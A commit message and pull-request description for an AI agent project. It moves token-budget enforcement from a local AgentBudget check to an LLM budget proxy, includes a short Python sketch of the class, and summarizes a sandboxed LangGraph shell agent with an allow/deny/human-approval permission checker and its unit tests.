Token budget is now enforced by the LLM Budget Proxy (returns HTTP 402 when exceeded). The local AgentBudget.exceeded property no longer checks tokens_exceeded — only iterations and wall clock. add_tokens() still tracks in-process usage for budget_update events shown in the UI LoopSummaryBar. Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com> Signed-off-by: Ladislav Smola <lsmola@redhat.com>
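After this change the local budget check reduces to iterations and wall clock; a self-contained sketch of the described AgentBudget behavior, with field names and defaults assumed:

```python
import time

class AgentBudget:
    """Local budget: iterations + wall clock only; tokens are the proxy's job."""
    def __init__(self, max_iterations: int = 100, max_seconds: float = 3600.0):
        self.max_iterations = max_iterations
        self.max_seconds = max_seconds
        self.iterations = 0
        self.tokens_used = 0               # still tracked for UI budget_update events
        self._started = time.monotonic()

    def add_tokens(self, n: int) -> None:
        self.tokens_used += n              # informational only, never enforced here

    @property
    def exceeded(self) -> bool:
        # Token overruns surface as HTTP 402 from the LLM Budget Proxy instead.
        return (self.iterations >= self.max_iterations
                or time.monotonic() - self._started >= self.max_seconds)
```

Splitting enforcement this way avoids double-counting: the proxy sees every call (including sub-agents), so its 402 is authoritative, while the local counter only feeds the LoopSummaryBar.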
Summary
- sandbox_agent: LangGraph agent with sandboxed shell execution
- settings.json: three-tier permission checker (allow/deny/HITL)
- sources.json: capability declaration (registries, remotes, runtime limits)

Tests
68 unit tests passing (permissions, sources, workspace, executor, graph)
Design Doc
See docs/plans/2026-02-14-agent-context-isolation-design.md in the kagenti/kagenti repo.

🤖 Generated with Claude Code